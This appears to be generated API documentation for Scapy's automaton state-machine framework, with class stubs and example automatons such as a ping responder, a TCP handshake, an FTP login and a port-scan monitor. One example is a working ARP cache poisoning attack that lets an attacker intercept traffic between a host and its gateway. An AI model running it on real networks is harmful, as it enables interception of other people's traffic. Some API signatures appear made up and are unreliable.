Interactive packet manipulation program and library for network security research and testing
—
State machine framework for building automated network protocols, responding to network events, and creating interactive network services and attack simulations.
Core state machine class for building automated network behaviors and protocol implementations.
class Automaton:
"""
Base class for creating network protocol automatons.
"""
def __init__(self, *args, **kwargs):
"""
Initialize automaton.
Parameters:
- *args: Positional arguments
- **kwargs: Keyword arguments for configuration
"""
def start(self) -> None:
"""
Start the automaton execution.
"""
def stop(self) -> None:
"""
Stop the automaton execution.
"""
def restart(self) -> None:
"""
Restart the automaton from initial state.
"""
def run(self, resume: int = 0, timeout: float = None) -> None:
"""
Run the automaton with optional timeout.
Parameters:
- resume: Resume from specific point
- timeout: Maximum runtime in seconds
"""
def runbg(self, resume: int = 0, timeout: float = None) -> None:
"""
Run automaton in background thread.
Parameters:
- resume: Resume from specific point
- timeout: Maximum runtime in seconds
"""
def send(self, pkt: Packet) -> None:
"""
Send a packet from the automaton.
Parameters:
- pkt: Packet to send
"""
def receive(self, pkt: Packet) -> None:
"""
Process received packet in automaton.
Parameters:
- pkt: Received packet
"""Decorators for defining automaton states, transitions, and behaviors.
class ATMT:
"""
Automaton decorators and utilities for state machine definition.
"""
@staticmethod
def state(initial: bool = False, final: bool = False, error: bool = False):
"""
Define an automaton state.
Parameters:
- initial: Mark as initial state
- final: Mark as final state
- error: Mark as error state
Returns:
decorator: State decorator function
"""
@staticmethod
def action(func: callable):
"""
Define action to execute when entering a state.
Parameters:
- func: Function to execute as action
Returns:
decorator: Action decorator
"""
@staticmethod
def condition(func: callable, prio: int = 0):
"""
Define condition for state transition.
Parameters:
- func: Condition function
- prio: Priority for condition evaluation
Returns:
decorator: Condition decorator
"""
@staticmethod
def receive(func: callable, prio: int = 0):
"""
Define packet receive handler.
Parameters:
- func: Handler function for received packets
- prio: Priority for receive handler
Returns:
decorator: Receive decorator
"""
@staticmethod
def timeout(func: callable, timeout: float):
"""
Define timeout handler for state.
Parameters:
- func: Timeout handler function
- timeout: Timeout value in seconds
Returns:
decorator: Timeout decorator
"""
@staticmethod
def ioevent(func: callable, name: str, as_supersocket: bool = False):
"""
Define I/O event handler.
Parameters:
- func: Event handler function
- name: Event name
- as_supersocket: Treat as supersocket event
Returns:
decorator: I/O event decorator
"""Pre-built automatons for common network protocols and responses.
class ARP_am(Automaton):
"""
ARP answering machine that responds to ARP requests.
"""
def __init__(self, iface: str = None, **kwargs):
"""
Initialize ARP answering machine.
Parameters:
- iface: Interface to monitor
- **kwargs: Additional configuration
"""
class ICMP_am(Automaton):
"""
ICMP answering machine for ping responses.
"""
def __init__(self, iface: str = None, **kwargs):
"""
Initialize ICMP answering machine.
Parameters:
- iface: Interface to monitor
- **kwargs: Additional configuration
"""
class DHCPServer_am(Automaton):
"""
DHCP server answering machine.
"""
def __init__(self, iface: str = None, pool: str = "192.168.1.100-192.168.1.200", **kwargs):
"""
Initialize DHCP server.
Parameters:
- iface: Interface to serve DHCP on
- pool: IP address pool for allocation
- **kwargs: Additional DHCP configuration
"""
class DNS_am(Automaton):
"""
DNS server answering machine.
"""
def __init__(self, iface: str = None, records: dict = None, **kwargs):
"""
Initialize DNS server.
Parameters:
- iface: Interface to monitor
- records: DNS records to serve
- **kwargs: Additional configuration
"""Client-side automatons for automated protocol interactions.
class TCP_client(Automaton):
"""
TCP client automaton for automated connections.
"""
def __init__(self, ip: str, port: int, **kwargs):
"""
Initialize TCP client.
Parameters:
- ip: Target IP address
- port: Target port
- **kwargs: Additional TCP options
"""
class HTTP_client(Automaton):
"""
HTTP client automaton for web requests.
"""
def __init__(self, host: str, port: int = 80, **kwargs):
"""
Initialize HTTP client.
Parameters:
- host: Target hostname
- port: Target port
- **kwargs: Additional HTTP options
"""
class SMTP_client(Automaton):
"""
SMTP client automaton for email sending.
"""
def __init__(self, server: str, port: int = 25, **kwargs):
"""
Initialize SMTP client.
Parameters:
- server: SMTP server address
- port: SMTP server port
- **kwargs: Additional SMTP options
"""from scapy.all import *
class SimpleResponder(Automaton):
"""
Simple automaton that responds to ICMP pings.
"""
@ATMT.state(initial=True)
def WAITING(self):
"""Initial waiting state."""
print("Waiting for ICMP packets...")
@ATMT.receive(WAITING)
def receive_icmp(self, pkt):
"""Handle received ICMP packets."""
if pkt.haslayer(ICMP) and pkt[ICMP].type == 8: # Echo request
print(f"Received ping from {pkt[IP].src}")
self.icmp_request = pkt
raise self.RESPONDING()
@ATMT.state()
def RESPONDING(self):
"""State for sending ICMP reply."""
pass
@ATMT.action(RESPONDING)
def send_reply(self):
"""Send ICMP echo reply."""
reply = IP(dst=self.icmp_request[IP].src, src=self.icmp_request[IP].dst) / \\
ICMP(type=0, id=self.icmp_request[ICMP].id, seq=self.icmp_request[ICMP].seq)
self.send(reply)
print(f"Sent reply to {self.icmp_request[IP].src}")
raise self.WAITING()
# Start the automaton
responder = SimpleResponder()
responder.runbg()class TCPConnector(Automaton):
"""
Automaton that establishes TCP connections.
"""
def __init__(self, target_ip: str, target_port: int):
super().__init__()
self.target_ip = target_ip
self.target_port = target_port
self.src_port = random.randint(1024, 65535)
self.seq = random.randint(0, 2**32-1)
@ATMT.state(initial=True)
def CLOSED(self):
"""Initial closed state."""
pass
@ATMT.action(CLOSED)
def send_syn(self):
"""Send TCP SYN packet."""
syn = IP(dst=self.target_ip) / TCP(sport=self.src_port, dport=self.target_port,
flags="S", seq=self.seq)
self.send(syn)
print(f"Sent SYN to {self.target_ip}:{self.target_port}")
raise self.SYN_SENT()
@ATMT.state()
def SYN_SENT(self):
"""Waiting for SYN-ACK."""
pass
@ATMT.receive(SYN_SENT)
def receive_synack(self, pkt):
"""Handle SYN-ACK response."""
if (pkt.haslayer(TCP) and pkt[TCP].flags == 18 and # SYN-ACK
pkt[TCP].dport == self.src_port and pkt[TCP].sport == self.target_port):
self.ack_seq = pkt[TCP].seq + 1
raise self.ESTABLISHED()
@ATMT.timeout(SYN_SENT, 5)
def syn_timeout(self):
"""Handle SYN timeout."""
print("SYN timeout - connection failed")
raise self.CLOSED()
@ATMT.state()
def ESTABLISHED(self):
"""Connection established state."""
pass
@ATMT.action(ESTABLISHED)
def send_ack(self):
"""Send ACK to complete handshake."""
ack = IP(dst=self.target_ip) / TCP(sport=self.src_port, dport=self.target_port,
flags="A", seq=self.seq+1, ack=self.ack_seq)
self.send(ack)
print(f"Connection established with {self.target_ip}:{self.target_port}")
# Use the automaton
connector = TCPConnector("192.168.1.1", 80)
connector.run(timeout=10)class SimpleHTTPServer(Automaton):
"""
Simple HTTP server automaton.
"""
def __init__(self, port: int = 8080):
super().__init__()
self.port = port
self.connections = {}
@ATMT.state(initial=True)
def LISTENING(self):
"""Listening for HTTP requests."""
print(f"HTTP server listening on port {self.port}")
@ATMT.receive(LISTENING)
def receive_http(self, pkt):
"""Handle HTTP requests."""
if (pkt.haslayer(TCP) and pkt.haslayer(Raw) and
pkt[TCP].dport == self.port and b"GET" in pkt[Raw].load):
self.client_ip = pkt[IP].src
self.client_port = pkt[TCP].sport
self.server_seq = pkt[TCP].ack
self.client_seq = pkt[TCP].seq + len(pkt[Raw].load)
print(f"HTTP request from {self.client_ip}:{self.client_port}")
raise self.RESPONDING()
@ATMT.state()
def RESPONDING(self):
"""Sending HTTP response."""
pass
@ATMT.action(RESPONDING)
def send_response(self):
"""Send HTTP response."""
response_data = (
b"HTTP/1.1 200 OK\\r\\n"
b"Content-Type: text/html\\r\\n"
b"Content-Length: 27\\r\\n"
b"\\r\\n"
b"<h1>Hello from Scapy!</h1>"
)
response = (IP(dst=self.client_ip) /
TCP(sport=self.port, dport=self.client_port,
flags="PA", seq=self.server_seq, ack=self.client_seq) /
Raw(response_data))
self.send(response)
print(f"Sent HTTP response to {self.client_ip}:{self.client_port}")
raise self.LISTENING()
# Start HTTP server
server = SimpleHTTPServer(port=8080)
server.runbg()class ARPPoisoner(Automaton):
"""
ARP poisoning attack automaton.
"""
def __init__(self, target_ip: str, gateway_ip: str):
super().__init__()
self.target_ip = target_ip
self.gateway_ip = gateway_ip
self.attacker_mac = get_if_hwaddr(conf.iface)
@ATMT.state(initial=True)
def POISONING(self):
"""Continuously poison ARP caches."""
pass
@ATMT.action(POISONING)
def send_poison(self):
"""Send poisoned ARP responses."""
# Poison target's ARP cache (gateway -> attacker)
poison_target = ARP(op=2, pdst=self.target_ip, hwdst="ff:ff:ff:ff:ff:ff",
psrc=self.gateway_ip, hwsrc=self.attacker_mac)
# Poison gateway's ARP cache (target -> attacker)
poison_gateway = ARP(op=2, pdst=self.gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",
psrc=self.target_ip, hwsrc=self.attacker_mac)
sendp(poison_target, verbose=0)
sendp(poison_gateway, verbose=0)
print(f"Sent ARP poison: {self.target_ip} <-> {self.gateway_ip}")
@ATMT.timeout(POISONING, 5)
def repeat_poison(self):
"""Repeat poisoning every 5 seconds."""
raise self.POISONING()
# WARNING: Only use for authorized testing!
# poisoner = ARPPoisoner("192.168.1.100", "192.168.1.1")
# poisoner.runbg()class FTPClient(Automaton):
"""
FTP client automaton with authentication.
"""
def __init__(self, server: str, username: str, password: str):
super().__init__()
self.server = server
self.username = username
self.password = password
self.port = 21
@ATMT.state(initial=True)
def CONNECTING(self):
"""Connecting to FTP server."""
print(f"Connecting to FTP server {self.server}")
@ATMT.action(CONNECTING)
def connect(self):
"""Establish TCP connection."""
syn = IP(dst=self.server) / TCP(dport=self.port, flags="S")
self.send(syn)
raise self.CONNECTED()
@ATMT.state()
def CONNECTED(self):
"""Connected, waiting for welcome message."""
pass
@ATMT.receive(CONNECTED)
def receive_welcome(self, pkt):
"""Handle FTP welcome message."""
if pkt.haslayer(Raw) and b"220" in pkt[Raw].load:
print("Received FTP welcome message")
raise self.AUTHENTICATING()
@ATMT.state()
def AUTHENTICATING(self):
"""Sending authentication."""
pass
@ATMT.action(AUTHENTICATING)
def send_username(self):
"""Send username."""
user_cmd = f"USER {self.username}\\r\\n".encode()
cmd_pkt = IP(dst=self.server) / TCP(dport=self.port) / Raw(user_cmd)
self.send(cmd_pkt)
print(f"Sent username: {self.username}")
raise self.USERNAME_SENT()
@ATMT.state()
def USERNAME_SENT(self):
"""Username sent, waiting for password prompt."""
pass
@ATMT.receive(USERNAME_SENT)
def receive_pass_prompt(self, pkt):
"""Handle password prompt."""
if pkt.haslayer(Raw) and b"331" in pkt[Raw].load:
pass_cmd = f"PASS {self.password}\\r\\n".encode()
cmd_pkt = IP(dst=self.server) / TCP(dport=self.port) / Raw(pass_cmd)
self.send(cmd_pkt)
print("Sent password")
raise self.AUTHENTICATED()
@ATMT.state(final=True)
def AUTHENTICATED(self):
"""Successfully authenticated."""
print("FTP authentication successful!")
# Use FTP client
# ftp = FTPClient("ftp.example.com", "testuser", "testpass")
# ftp.run(timeout=30)class NetworkMonitor(Automaton):
"""
Network monitoring automaton with alerts.
"""
def __init__(self):
super().__init__()
self.suspicious_ips = set()
self.connection_counts = {}
@ATMT.state(initial=True)
def MONITORING(self):
"""Continuously monitor network traffic."""
print("Starting network monitoring...")
@ATMT.receive(MONITORING)
def analyze_packet(self, pkt):
"""Analyze incoming packets for threats."""
if pkt.haslayer(IP):
src_ip = pkt[IP].src
# Count connections per IP
self.connection_counts[src_ip] = self.connection_counts.get(src_ip, 0) + 1
# Check for port scanning
if pkt.haslayer(TCP) and pkt[TCP].flags == 2: # SYN packet
if self.connection_counts[src_ip] > 100: # Threshold
if src_ip not in self.suspicious_ips:
self.suspicious_ips.add(src_ip)
self.alert_ip = src_ip
raise self.ALERT()
@ATMT.state()
def ALERT(self):
"""Generate security alert."""
pass
@ATMT.action(ALERT)
def generate_alert(self):
"""Generate and log security alert."""
print(f"SECURITY ALERT: Possible port scan from {self.alert_ip}")
print(f"Connection count: {self.connection_counts[self.alert_ip]}")
# Could send notification, write to log, etc.
raise self.MONITORING()
@ATMT.timeout(MONITORING, 60)
def reset_counters(self):
"""Reset connection counters periodically."""
self.connection_counts.clear()
print("Reset connection counters")
raise self.MONITORING()
# Start network monitor
# monitor = NetworkMonitor()
# monitor.runbg()Install with Tessl CLI
npx tessl i tessl/pypi-scapy